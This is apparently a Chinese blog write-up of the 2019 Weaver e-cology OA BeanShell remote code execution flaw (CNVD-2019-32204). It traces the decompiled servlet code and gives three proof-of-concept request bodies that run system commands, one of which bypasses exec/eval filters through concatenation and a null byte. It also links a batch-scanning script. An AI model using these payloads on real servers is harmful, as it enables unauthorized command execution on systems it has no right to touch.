执行系统命令_E-cology远程代码执行漏洞原理分析

最新推荐文章于 2024-07-16 09:57:37 发布
最新推荐文章于 2024-07-16 09:57:37 发布
阅读量436 收藏
点赞数
文章标签: 执行系统命令
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31520435/article/details/112739653
版权

最近曝光了很多漏洞,后续将对这些有代表性的漏洞进行分析审分析,今天有空先审计分析泛微 OA RCE漏洞。

7b782c829a63f5fed7cf38e1e3e592bb.png

事件背景

2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁,泛微e-cology OA系统的J**A Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行,漏洞等级严重。

漏洞信息

5193d5a64e34038d16d01eeef034c93e.png

原理分析

此次存在漏洞的是J**A Beanshell接口,先了解下Beanshell的基础。

1.BeanShell知识

(来源:https://github.com/beanshell/beanshell)

BeanShell是一个小型的,免费的,可嵌入的Java源解释器,具有使用Java编写的对象脚本语言功能。BeanShell动态执行标准Java语法,并通过通用的脚本编写便利进行扩展,例如松散的类型,命令和方法闭包(如Perl和JavaScript)。

可以交互地使用BeanShell进行Java实验和调试,以及以新方式扩展应用程序。

Beanshell可以执行print、dir、eval、exec等命令

页面如下图:

37702b83df4ea3fe9fbbe7d1872c5f41.png

2.泛微中Beanshell库jar代码静态分析

本次漏洞是因为泛微OA系统的J**A Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,执行系统命令。

先对bsh-2.0b4.jar 文件分析,利用Jadx工具反编译查看servlet.BshServlet这个类

b438480218e9c7c1273c81f913a01c97.png

在类中发现doGet和doPost方法,用来接收并执行提交的数据。

doPost是对doGet的二次封装

ba3552bf5b67d615a8e4adb77b3249e0.png

在doGet方法中看到调用evalScript方法创建一个名为obj的对象,再看evalScript这个方法中的pramString参数,最终会被interpreter.eval处理。如下图

9e89d878b17f5d4a25fc1db9a7be7a54.png

跟进 bsh.Interpreter类的eval方法

c9401eb908a662814c0bad4b15d4cec1.png

跳转到bsh.classpath/ClassManagerImpl.class类

ff2bc30604fbddae50076bc93530a970.png

该类调用了bsh.commands/exec.bsh脚本,该脚本可以执行命令

fde701df44e24881fa50d389ed4da5c9.png

漏洞复现

1.泛微OA BeanShell复现测试

5a63aceebb7df8bdeb0ce7675161b4c9.png

把print("hello!")换成exec("whoami"),就可以测试能否执行系统命令了。

Poc1:bsh.script=exec("whoami");&bsh.servlet.output=raw

b2bd849bf9c7d9768347733d651d405c.png

如果有全局过滤器过滤了exec或eval,会有报错,如下图:

可以采用unicode编码、字符串拼接等方式绕过,见下图:

Poc2:bsh.script=exec("whoami");&bsh.servlet.output=raw

cbdd314591324cbf1994025f00a98f7c.png

Poc3:

bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter("command"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami

7baa4990afd5d97823c1387cf59ecd51.png

2.批量验证脚本

该脚本组合了常用的泛微OA web路径,加上本文讲解绕过过滤器的3个Poc

99fedf14a79081449d3f90b992a4807d.png

该工具仅用于测试研究使用请勿他用。

脚本地址:

https://github.com/myzing00/Vulnerability-analysis/tree/master/0917/weaver-oa/CNVD-2019-32204

修复建议

升级e-cology OA最新版本或安装官方BSH安全补丁包

陈晓理
关注
漏洞复现】泛微OA E-Cology getdata.jsp SQL注入漏洞
alert['Hello World']
07-18 605
泛微OA E-Cology getdata.jsp 接口存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性。
漏洞复现】泛微 e-cology v10.0 远程代码执行漏洞
最新发布
做自己喜欢的事,并将其发挥到极致!
08-23 468
泛微e-cology是一套功能丰富的协同管理应用平台,集成了企业信息门户、知识管理、数据中心、工作流管理、人力资源管理、客户与合作伙伴管理、项目管理、财务管理、资产管理等多项功能。该漏洞通过Ecology-10.0获取管理员访问令牌,然后通过JDBC反序列化和实现RCE,系统依赖于H2 数据库。
SRC挖掘日常3
jennycisp的博客
05-06 860
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。如果你把每周要学的内容精细化到这种程度,你还会担心学不会,入不了门吗,其实说到底就是学了两个月,但都是东学一下,西学一下,什么内容都是浅尝辄止,没有深入进去,所以才会有学了2个月,入不了门这种感受。聊完宏观的,我们再落到具体的技术点上来,给你看看我给团队小伙伴制定的网络安全学习路线,整体大概半年左右,具体视每个人的情况而定。
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 1021
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
网站安全测试与检测中 发现的OA系统中的SQL注入漏洞
网站安全专家
10-12 1061
近日,SINE安全监测中心监控到泛微OA系统被爆出存在高危的sql注入漏洞,该移动办公OA系统,在正常使用过程中可以伪造匿名身份来进行SQL注入攻击,获取用户等隐私信息,目前该网站漏洞影响较大,使用此E-cology的用户,以及数据库oracle都会受到该漏洞的攻击,经过安全技术的POC安全测试,发现漏洞的利用非常简单,危害较大,可以获取管理员的账号密码,以及webshell。 该OA...
漏洞复现】泛微OA E-Cology BshServlet 远程代码执行漏洞
alert['Hello World']
07-12 1070
泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微e-cology OA系统的Java Beanshell接口可被未授权访问, 攻击者调用该Beanshell接口, 可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行
泛微OA漏洞学习——E-Cology BshServlet 远程代码执行漏洞 CNVD-2019-32204
记录并分享学习安全的知识点..
07-10 1715
2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁,泛微e-cology OA系统的J**A Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行漏洞等级严重。......
泛微 e-cology OA 远程代码执行漏洞复现(亲测有效)
热门推荐
花花的博客
12-09 1万+
你踩过的坑,我都填过,哇哈哈哈哈哈 0x00前言 整个环境搭下来,安装的东西有点多,遇到的问题也不少,说复杂,但是搭完感觉还好并不难。大家不要觉得很难懒得搭,一定要耐心一步一步的搭建。 0x01漏洞简介 1.漏洞成因 该漏洞位于 e-cology OA系统BeanShell组件中,并且该组件允许未授权访问,攻击者可通过访问该组件执行任意的Java代码,也就是说可以执行任意命令 2. 影...
泛微E-Cology XXE漏洞复现(QVD-2023-16177)
0xSec
07-23 6548
泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
【工具】通达漏洞综合利用工具v1.0
Wulai399的博客
06-06 663
通达漏洞综合利用工具v1.0
0day 未公开 泛微E-Cology 存在源码信息泄露漏洞
weixin_43167326的博客
07-09 1201
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。。
泛微E-Cology getFileViewUrl SSRF漏洞复现
0xSec
07-09 2334
泛微E-Cology getFileViewUrl 接口处存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。
漏洞预警】泛微E-Cology ofsLogin任意用户登陆漏洞
做自己喜欢的事,并将其发挥到极致!
05-17 5588
泛微e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology前台任意用户登录漏洞:泛微e-cology9部分版本中存在前台任意用户登录漏洞。该漏洞允许未经身份验证的攻击者通过发送构造的请求触发漏洞,成功利用此漏洞的攻击者可登录任意用户。
漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
qq_50854662的博客
03-20 8111
漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
漏洞复现】泛微e-cology——resourceservlet——任意文件读取
LongL_GuYu的博客
07-09 779
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公解决方案。其`resourceservlet`接口存在任意文件读取漏洞,未授权攻击者可以利用其读取网站配置文件等敏感信息。
泛微e-cology WorkflowServiceXml SQL注入漏洞(POC)
m0_62584974的博客
07-16 1132
泛微 e-cology v10.64.1的/services/接口默认对内网暴露,用于服务调用,未经身份认证的攻击者可向 /services/WorkflowServiceXml 接口发送恶意的SOAP请求进行SQL注入,攻击者通过漏洞可以获取服务器数据库敏感信息。分析:基于当前情报,漏洞可能被用于攻击e-Cology WorkflowServiceXml系统,建议更新系统补丁、加强输入验证和限制访问权限。更新e-Cology WorkflowServiceXml系统到最新版本。
泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)
ZL_1618的博客
03-09 1862
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology9中存在SQL注入漏洞,未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
泛微e-cology OA Beanshell组件远程代码执行漏洞分析
漏洞的成因是 Beanshell组件的远程代码执行漏洞。攻击者可以通过访问http://x.x.x.x:8001/weaver/bsh.servlet.BshServlet来触发该漏洞,从而执行恶意代码。 ** 漏洞利用 ** 攻击者可以使用Python脚本来利用该...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值